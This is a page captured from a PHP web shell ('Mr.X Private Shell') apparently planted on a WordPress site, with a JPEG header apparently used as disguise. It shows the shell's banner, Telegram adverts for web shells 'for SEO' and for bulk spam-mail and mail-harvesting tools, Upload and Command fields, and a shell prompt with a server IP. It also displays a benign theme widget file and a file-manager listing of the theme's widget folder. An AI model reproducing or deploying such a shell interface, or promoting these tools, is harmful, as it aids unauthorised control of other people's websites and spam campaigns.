����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

antiaginglove@216.73.216.231: ~ $
<?php
/***
 * Recent Posts Widget
 *
 * Display the latest posts from a selected category in a boxed layout. 
 *
 * @package PMThemes Widget Bundle
 */
if ( ! defined( 'ABSPATH' ) ) {
    exit; // Exit if accessed directly.
}
class Pmthemes_Recent_Posts_Widget extends WP_Widget {

	/**
	 * Widget Constructor
	 *
	 * @uses WP_Widget::__construct() Create Widget
	 * @return void
	 */
	function __construct() {

		// Setup Widget
		parent::__construct(
			'pmthemes_recent_posts', // ID
			sprintf( esc_html__( 'PM Recent Posts', 'pmthemes' ) ), // Name
			array( 
				'classname' => 'pmthemes_recent_posts', 
				'description' => esc_html__( 'For sidebar. Show recent posts with post thumbnails.', 'pmthemes' ) 
			) // Args
		);
		
		// Delete Widget Cache on certain actions
		add_action( 'save_post', array( $this, 'delete_widget_cache' ) );
		add_action( 'deleted_post', array( $this, 'delete_widget_cache' ) );
		add_action( 'switch_theme', array( $this, 'delete_widget_cache' ) );
		
	}
	
	
	/**
	 * Set default settings of the widget
	 *
	 * @return array Default widget settings.
	 */
	private function default_settings() {
	
		$defaults = array(
			'title'				=> '',
			'category'			=> 0,
			'order'				=> 'date',
			'number'			=> 5,
			'excerpt_length' 	=> 0,
			'thumbnails'		=> true,
			'meta_date'			=> false,
			'meta_author'		=> false,
			'meta_comments'		=> false
		);
		
		return $defaults;
		
	}
	
	
	/**
	 * Reset widget cache object
	 *
	 * @return void
	 */
	public function delete_widget_cache() {
		
		wp_cache_delete('pmts_recent_posts', 'widget');
		
	}
	
	
	/**
	 * Returns the excerpt length in number of words
	 *
	 * @return integer $this->excerpt_length Number of Words
	 */
	function excerpt_length( $length ) {
		return $this->excerpt_length;
	}
	
	
	/**
	 * Main Function to display the widget
	 * 
	 * @uses this->render()
	 * 
	 * @param array $args Parameters from widget area created with register_sidebar()
	 * @param array $instance Settings for this widget instance
	 * @return void
	 */
	function widget( $args, $instance ) {

		$cache = array();
		
		// Get Widget Object Cache
		if ( ! $this->is_preview() ) {
			$cache = wp_cache_get( 'pmts_recent_posts', 'widget' );
		}
		if ( ! is_array( $cache ) ) {
			$cache = array();
		}

		// Display Widget from Cache if exists
		if ( isset( $cache[ $this->id ] ) ) {
			echo $cache[ $this->id ];
			return;
		}
		
		// Start Output Buffering
		ob_start();
		
		// Get Widget Settings
		$settings = wp_parse_args( $instance, $this->default_settings() );
		
		// Add Widget Title Filter
		$widget_title = apply_filters('widget_title', $settings['title'], $settings, $this->id_base);
		
		// Output
		echo $args['before_widget'];

		// Display Title
		if( !empty( $widget_title ) ) { echo $args['before_title'] . $widget_title . $args['after_title']; }; ?>
			
		<div class="widget-recent-posts widget-posts-entries">
			
			<ul class="pmts-posts-list">
				<?php echo $this->render( $settings ); ?>
			</ul>
			
		</div>
			
		<?php
		echo $args['after_widget'];
		
		// Set Cache
		if ( ! $this->is_preview() ) {
			$cache[ $this->id ] = ob_get_flush();
			wp_cache_set( 'pmts_recent_posts', $cache, 'widget' );
		} else {
			ob_end_flush();
		}
	
	}
	
	/**
	 * Display the post list
	 * 
	 * @param array $instance Settings for this widget instance
	 * @return void
	 */
	function render( $settings ) {
		// Get latest posts from database
		$query_arguments = array(
			'posts_per_page' => (int)$settings['number'],
			'ignore_sticky_posts' => true,
			'post__not_in' => array (get_the_ID()),
			'cat' => (int)$settings['category'],
			'orderby' => esc_attr($settings['order'])
		);
		$posts_query = new WP_Query($query_arguments);
		
		// Check if there are posts
		if( $posts_query->have_posts() ) :
		
			// Limit the number of words for the excerpt
			$this->excerpt_length = (int)$settings['excerpt_length'];
			add_filter('excerpt_length', array($this, 'excerpt_length') );	
			
			// Display Posts
			while( $posts_query->have_posts() ) :
				$posts_query->the_post();
                if ( true == $settings['thumbnails'] and has_post_thumbnail() ) : ?>
                    <li class="widget-thumb">
                    <div class="rp-title">
                    <a href="<?php the_permalink() ?>" title="<?php echo esc_attr(get_the_title() ? get_the_title() : get_the_ID()); ?>">
                        <?php the_post_thumbnail('widget_post_thumb'); ?>
                    </a>
                <?php else: ?>
                    <li>
                    <div class="rp-title">
                <?php endif; ?>
                    <a href="<?php the_permalink() ?>" title="<?php echo esc_attr(get_the_title() ? get_the_title() : get_the_ID()); ?>">
                        <?php if ( get_the_title() ) the_title(); else the_ID(); ?>
                    </a>
                    </div>
                <?php // Display Post Content
                if ( $settings['excerpt_length'] > 0 ) : ?>
                    <span class="pmts-excerpt"><?php the_excerpt(); ?></span>
                <?php endif;

				// Display Post Meta
				echo $this->postmeta( $settings );
				
			endwhile;
			
			// Remove excerpt filter
			remove_filter('excerpt_length', array($this, 'excerpt_length') );	
			
		endif;
		
		// Reset Postdata
		wp_reset_postdata();
		
	}

	
	/**
	 * Display post meta
	 * 
	 * @param array $instance Settings for this widget instance
	 * @return void
	 */
	function postmeta( $settings ) {
		
		// Create Post Meta Array
		$postmeta = array( $settings['meta_date'], $settings['meta_author'], $settings['meta_comments'] );
		
		// Return early if no meta is displayed
		if( in_array( true, $postmeta, true ) === false ) :
			return;
		endif;
		?>
		
		<div class="widget-postmeta">
			
		<?php // Display Date
		if ( true == $settings['meta_date'] ) : ?>
			
			<span class="widget-date"><?php the_time(get_option('date_format')); ?></span>
			
		<?php endif; ?>
		
		<?php // Display Author
		if ( true == $settings['meta_author'] ) : ?>
			<span class="widget-author">
				<?php printf('<a href="%1$s" title="%2$s" rel="author">%3$s</a>', 
				esc_url( get_author_posts_url( get_the_author_meta( 'ID' ) ) ),
				esc_attr( sprintf( esc_html__( 'View all posts by %s', 'pmthemes' ), get_the_author() ) ),
				esc_html( get_the_author() )
				);?>
			</span>
			
		<?php endif; ?>
		
		<?php // Display Comments
		if ( true == $settings['meta_comments'] and comments_open() ) : ?>
		
			<span class="widget-comment">
				<?php comments_popup_link( esc_html__( 'No comments', 'pmthemes' ), esc_html__( 'One comment','pmthemes' ), esc_html__( '% comments','pmthemes' ) ); ?>
			</span>
			
		<?php endif; ?>
		
		</div>
		
	<?php
	}
	
	
	/**
	 * Update Widget Settings
	 *
	 * @param array $new_instance Form Input for this widget instance
	 * @param array $old_instance Old Settings for this widget instance
	 * @return array $instance New widget settings
	 */
	function update( $new_instance, $old_instance ) {

		$instance = $old_instance;
		$instance['title'] = esc_attr($new_instance['title']);
		$instance['category'] = (int)$new_instance['category'];
		$instance['order'] = esc_attr($new_instance['order']);
		$instance['number'] = (int)$new_instance['number'];
		$instance['excerpt_length'] = (int)$new_instance['excerpt_length'];
		$instance['thumbnails'] = !empty($new_instance['thumbnails']);
		$instance['meta_date'] = !empty($new_instance['meta_date']);
		$instance['meta_author'] = !empty($new_instance['meta_author']);
		$instance['meta_comments'] = !empty($new_instance['meta_comments']);
		
		$this->delete_widget_cache();
		
		return $instance;
	}

	
	/**
	 * Display Widget Settings Form in the Backend
	 *
	 * @param array $instance Settings for this widget instance
	 * @return void
	 */
	function form( $instance ) {
		
		// Get Widget Settings
		$settings = wp_parse_args( $instance, $this->default_settings() );
		
		?>
		
		<p>
			<label for="<?php echo $this->get_field_id('title'); ?>"><?php esc_html_e('Title:', 'pmthemes'); ?>
				<input class="widefat" id="<?php echo $this->get_field_id('title'); ?>" name="<?php echo $this->get_field_name('title'); ?>" type="text" value="<?php echo $settings['title']; ?>" />
			</label>
		</p>
		
		<p>
			<label for="<?php echo $this->get_field_id('category'); ?>"><?php esc_html_e('Select Category:', 'pmthemes'); ?></label><br/>
			<?php // Display Category Select
				$args = array(
					'show_option_all'    => esc_html__( 'All Categories', 'pmthemes' ),
					'selected'           => $settings['category'],
					'name'               => $this->get_field_name('category'),
					'id'                 => $this->get_field_id('category')
				);
				wp_dropdown_categories( $args ); 
			?>
		</p>
		
		<p>
			<label for="<?php echo $this->get_field_id('order'); ?>"><?php esc_html_e('Order by:', 'pmthemes'); ?></label><br/>
			<select name="<?php echo $this->get_field_name('order'); ?>" id="<?php echo $this->get_field_id('order'); ?>">
				<option <?php selected( $settings['order'], 'date' ); ?> value="date"><?php esc_html_e('Post Date', 'pmthemes'); ?></option>
				<option <?php selected( $settings['order'], 'comment_count' ); ?> value="comment_count"><?php esc_html_e('Comment Count', 'pmthemes'); ?></option>
				<option <?php selected( $settings['order'], 'rand' ); ?> value="rand"><?php esc_html_e('Random', 'pmthemes'); ?></option>
			</select>
		</p>

		<p>
			<label for="<?php echo $this->get_field_id('number'); ?>"><?php esc_html_e('Number of posts:', 'pmthemes'); ?>
				<input id="<?php echo $this->get_field_id('number'); ?>" name="<?php echo $this->get_field_name('number'); ?>" type="text" value="<?php echo $settings['number']; ?>" size="3" />
			</label>
		</p>

		<p>
			<label for="<?php echo $this->get_field_id('excerpt_length'); ?>"><?php esc_html_e('Excerpt length in number of words:', 'pmthemes'); ?>
				<input id="<?php echo $this->get_field_id('excerpt_length'); ?>" name="<?php echo $this->get_field_name('excerpt_length'); ?>" type="text" value="<?php echo $settings['excerpt_length']; ?>" size="5" />
			</label>
		</p>
		
		<p>
			<label for="<?php echo $this->get_field_id('thumbnails'); ?>">
				<input class="checkbox" type="checkbox" <?php checked( $settings['thumbnails'] ) ; ?> id="<?php echo $this->get_field_id('thumbnails'); ?>" name="<?php echo $this->get_field_name('thumbnails'); ?>" />
				<?php esc_html_e('Display post thumbnails', 'pmthemes'); ?>
			</label>
		</p>

		<p>
			<label for="<?php echo $this->get_field_id('meta_date'); ?>">
				<input class="checkbox" type="checkbox" <?php checked( $settings['meta_date'] ) ; ?> id="<?php echo $this->get_field_id('meta_date'); ?>" name="<?php echo $this->get_field_name('meta_date'); ?>" />
				<?php esc_html_e('Display post date', 'pmthemes'); ?>
			</label>
		</p>
		
		<p>
			<label for="<?php echo $this->get_field_id('meta_author'); ?>">
				<input class="checkbox" type="checkbox" <?php checked( $settings['meta_author'] ) ; ?> id="<?php echo $this->get_field_id('meta_author'); ?>" name="<?php echo $this->get_field_name('meta_author'); ?>" />
				<?php esc_html_e('Display post author', 'pmthemes'); ?>
			</label>
		</p>
		
		<p>
			<label for="<?php echo $this->get_field_id('meta_comments'); ?>">
				<input class="checkbox" type="checkbox" <?php checked( $settings['meta_comments'] ) ; ?> id="<?php echo $this->get_field_id('meta_comments'); ?>" name="<?php echo $this->get_field_name('meta_comments'); ?>" />
				<?php esc_html_e('Display post comments', 'pmthemes'); ?>
			</label>
		</p>

		<?php
	}
	
}

Filemanager

Name Type Size Permission Actions
popular-posts.php File 6.23 KB 0644
posts-boxed.php File 8.84 KB 0644
posts-columns.php File 11.12 KB 0644
posts-grid.php File 10.14 KB 0644
posts-single.php File 7.77 KB 0644
recent-comments.php File 7.1 KB 0644
recent-posts.php File 11.68 KB 0644
social-icons.php File 2.2 KB 0644
tabbed-content.php File 18.76 KB 0644